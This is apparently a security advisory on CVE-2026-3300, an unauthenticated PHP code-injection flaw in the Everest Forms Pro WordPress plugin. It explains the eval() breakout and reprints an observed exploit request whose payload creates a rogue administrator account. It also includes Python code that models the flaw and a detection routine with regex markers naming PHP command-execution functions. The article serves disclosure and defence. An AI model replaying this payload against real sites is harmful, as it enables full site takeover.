CVE-2026-3300: Critical vulnerability in Everest Forms Pro (exploited WordPress RCE)

A critical vulnerability has recently been discovered in the WordPress plugin Everest Forms Pro, a tool used by approximately 4,000 active sites to create and manage advanced forms. Identified as CVE-2026-3300, this security flaw perfectly illustrates how a design error in user data handling can lead to a complete compromise of a website.

Rated 9.8 out of 10 on the CVSS scale, this vulnerability allows an unauthenticated attacker to execute arbitrary PHP code remotely, opening the door to full server takeover.

A critical vulnerability in the plugin’s calculation engine

The issue lies in the “Complex Calculation” feature used by Everest Forms Pro to perform dynamic calculations based on data submitted in a form.

To execute these calculations, the plugin uses the PHP function eval().

This function is very dangerous because it takes a string and runs it as PHP code.

The problem is that data sent by the user is directly inserted into the PHP code before being passed to eval().

In simple terms:

$code = "\$FIELD_1 = '$user_input';";   // \$ keeps the variable name literal; only $user_input is interpolated
eval($code);

If a malicious user sends:

'; malicious_code(); //

The code becomes:

$FIELD_1 = '';
malicious_code();
//';

and PHP then executes the attacker’s code.

The plugin does pass the value through sanitize_text_field(), but that function only strips certain characters (tags, control characters, surplus whitespace); it does not escape apostrophes ('), which are significant inside PHP source code. Researchers found that an attacker could therefore break out of the string literal and inject their own PHP code. This is PHP Code Injection, which here leads directly to Remote Code Execution (RCE).
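To make the gap concrete, here is an added Python model of the pattern described above; it is example code written for this article, not the plugin's code or the vendor's patch. The sanitizer is an approximation of WordPress sanitize_text_field() (strip tags, control characters and surplus whitespace), the template mirrors the `$FIELD_1 = '...'` statement shown earlier, and the two hardened builders (backslash-escaping the literal, or accepting only numeric operands) are this example's own suggestions for illustration, not the fix shipped in 1.9.13.

```python
import re
from decimal import Decimal, InvalidOperation


def sanitize_text_field_like(value: str) -> str:
    """Approximation of WordPress sanitize_text_field() (assumption: modelled on its
    documented behaviour, not the real function): strips HTML tags, control
    characters and line breaks, and collapses runs of whitespace.
    It deliberately leaves apostrophes untouched, which is the gap behind the CVE."""
    value = re.sub(r"<[^>]*>", "", value)           # strip tags
    value = re.sub(r"[\x00-\x1f\x7f]", "", value)    # strip control characters / newlines
    return re.sub(r"\s+", " ", value).strip()        # collapse whitespace


def build_calculation_code(field: str, value: str) -> str:
    """The vulnerable pattern: the value is spliced straight into a PHP
    single-quoted literal that the engine later hands to eval()."""
    return f"${field} = '{value}';"


def value_escapes_literal(code: str) -> bool:
    """Scan the generated statement the way PHP's lexer would and report whether
    the single-quoted literal closes before the trailing ';' written by the
    template. PHP single-quoted strings only recognise \\' and \\\\ as escapes."""
    i = code.index("'") + 1                      # skip the opening quote of the template
    while i < len(code):
        ch = code[i]
        if ch == "\\" and i + 1 < len(code) and code[i + 1] in "'\\":
            i += 2                               # escaped quote/backslash stays inside the literal
            continue
        if ch == "'":
            # Literal closed here: anything other than the template's own ';' is injected code.
            return code[i + 1:] != ";"
        i += 1
    return True                                  # literal never closed: not what the template intended


def escape_for_php_single_quoted(value: str) -> str:
    """Hardening option 1 (this example's suggestion): make the value inert inside
    a single-quoted PHP literal by escaping the only two characters PHP treats
    specially there. Still not a substitute for dropping eval() entirely."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def numeric_operand(value: str) -> str:
    """Hardening option 2 (this example's suggestion): a calculation engine only
    needs numbers, so reject anything that is not a finite decimal before it is
    ever placed into code. Raises ValueError on anything else."""
    try:
        d = Decimal(value.strip())
    except (InvalidOperation, ValueError):
        raise ValueError(f"not a numeric operand: {value!r}")
    if not d.is_finite():                        # Decimal accepts 'NaN'/'Infinity'; PHP code should not
        raise ValueError(f"not a finite number: {value!r}")
    return str(d)


def build_calculation_code_hardened(field: str, value: str) -> str:
    """Numeric operands are embedded without quotes, so no string context exists to escape."""
    return f"${field} = {numeric_operand(value)};"


if __name__ == "__main__":
    # Constructed inputs: a benign number and a generic string-breakout value of the
    # shape discussed in the article (no real payload).
    for raw in ("12.5", "'; x(); //"):
        cleaned = sanitize_text_field_like(raw)
        code = build_calculation_code("FIELD_1", cleaned)
        print(f"{raw!r:14} -> {code!r:40} breakout={value_escapes_literal(code)}")
```

Running the block shows that the sanitizer returns the breakout value unchanged and that the generated statement closes its literal early, while either hardened builder keeps the value inside (or rejects it outright).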

Observed attack example


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
 
everest_forms[id]=2909&everest_forms[form_fields][svbtwqPN9R-2]=';if(!username_exists('diksimarina')){wp_insert_user(array('user_login'=>'diksimarina','user_pass'=>'[redacted]','user_email'=>'diksimarina@gmail.com','role'=>'administrator'));echo 'ADMINCREATED';}else{echo 'ADMINEXISTS';} //&everest_forms[form_fields][eluWudCcdM-1]=test&everest_forms[form_fields][email]=test&everest_forms[form_fields][rVuWSql19Q-3]=test&everest_forms[form_fields][rwkAbDLqrq-7]=test&everest_forms[form_fields][LKLn7arQDU-5]=test&action=everest_forms_ajax_form_submission&security=cd840335ff

This attack request example illustrates a real exploitation of the CVE-2026-3300 vulnerability in the Everest Forms Pro plugin, where an attacker abuses WordPress form processing to execute arbitrary PHP code. The attack begins with a POST request sent to the legitimate endpoint /wp-admin/admin-ajax.php, used by WordPress to handle AJAX form submissions. This allows the attacker to hide their activity within normal traffic that is difficult to distinguish from a legitimate user request.

The core of the attack is located in a specific form field (everest_forms[form_fields][svbtwqPN9R-2]) where the attacker injects a malicious payload. This value starts with a single apostrophe followed by a semicolon, which closes the PHP string literal into which the plugin inserts the value. Once this syntactic barrier is broken, the attacker directly injects PHP code, including calls to username_exists() and wp_insert_user(), in order to check whether a user exists and then create a new WordPress account with administrator privileges. In this example, the created account is named “diksimarina” and is configured with the administrator role, giving full access to the compromised site.

The end of the payload contains a comment marker //, which is crucial because it allows the rest of the code automatically generated by the plugin to be ignored, preventing PHP syntax errors and ensuring smooth execution of the injection. The other form fields contain normal values to simulate a legitimate submission and reduce suspicion.

Once the request is processed by the plugin and passed through the vulnerable calculation engine, the injected code is executed via eval(), turning a simple form submission into code execution on the server.
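Because the request rides on the legitimate admin-ajax.php endpoint, the distinguishing features are in the body: the action name and form-field values that begin by closing a PHP string literal and end with a line comment. The following Python triage routine is an added example written for this article (not Wordfence's or the vendor's tooling) that applies exactly those indicators to a captured request body; the field identifiers, nonce, form id and account name in the sample bodies are constructed placeholders, not the values from the real request.

```python
import re
from urllib.parse import unquote_plus

# Indicators drawn from the request shape described above: a quote closing the
# literal followed by a statement, a trailing '//' that swallows the template's
# remainder, and WordPress/PHP calls that have no business in a calculation field.
INJECTION_MARKERS = {
    "closes_string_literal": re.compile(r"'\s*;"),
    "trailing_line_comment": re.compile(r"//\s*$"),
    "code_call": re.compile(
        r"\b(wp_insert_user|username_exists|eval|system|exec|passthru|shell_exec)\s*\("
    ),
}

TARGET_ACTION = "everest_forms_ajax_form_submission"
FORM_FIELD_PREFIX = "everest_forms[form_fields]["


def parse_form_body(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded parser. It splits on '&' only,
    so the ';' characters inside a PHP payload are never mistaken for separators
    (older urllib.parse.parse_qs versions did treat ';' as one)."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def inspect_submission(body: str) -> list:
    """Return one finding per form field whose value carries injection markers.
    Only Everest Forms AJAX submissions are examined; other actions return []."""
    params = parse_form_body(body)
    if params.get("action") != TARGET_ACTION:
        return []
    findings = []
    for key, value in params.items():
        if not key.startswith(FORM_FIELD_PREFIX):
            continue
        matched = [name for name, rx in INJECTION_MARKERS.items() if rx.search(value)]
        if matched:
            findings.append({
                "field": key,
                "matched": matched,
                "form_id": params.get("everest_forms[id]"),
                "value_preview": value[:60],      # enough for an alert, not the whole payload
            })
    return findings


# Constructed sample bodies (placeholders, not the observed request).
BENIGN_BODY = (
    "everest_forms[id]=FORM_ID_PLACEHOLDER"
    "&everest_forms[form_fields][calc-2]=42"
    "&everest_forms[form_fields][email]=user%40example.com"
    "&action=everest_forms_ajax_form_submission&security=NONCE_PLACEHOLDER"
)

SUSPICIOUS_BODY = (
    "everest_forms[id]=FORM_ID_PLACEHOLDER"
    "&everest_forms[form_fields][calc-2]="
    "';if(!username_exists('EXAMPLE_USER')){wp_insert_user(array());} //"
    "&everest_forms[form_fields][email]=test"
    "&action=everest_forms_ajax_form_submission&security=NONCE_PLACEHOLDER"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(label, inspect_submission(body))
```

In practice the routine would be fed decoded POST bodies from a WAF or reverse-proxy log; a hit on `closes_string_literal` together with `trailing_line_comment` in a single calculation field is the signature worth alerting on, and the same run should be followed by a check of the site's user table for newly created administrator accounts.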

Patch and affected versions

The vulnerability affects all versions of Everest Forms Pro up to and including version 1.9.12. The patch was released in version 1.9.13, which prevents code injection and fixes how user data is processed before evaluation.

Users are therefore strongly encouraged to update their installations immediately to avoid active exploitation.

Conclusion: a high-impact critical RCE vulnerability

CVE-2026-3300 once again demonstrates that Remote Code Execution vulnerabilities remain among the most dangerous in the WordPress ecosystem. By combining improper user input handling with the use of dangerous functions such as eval(), a simple calculation feature becomes a gateway to full system compromise.

With active exploitation already occurring and thousands of blocked attempts, this flaw should be considered a critical priority for all administrators using Everest Forms Pro.

Source: https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/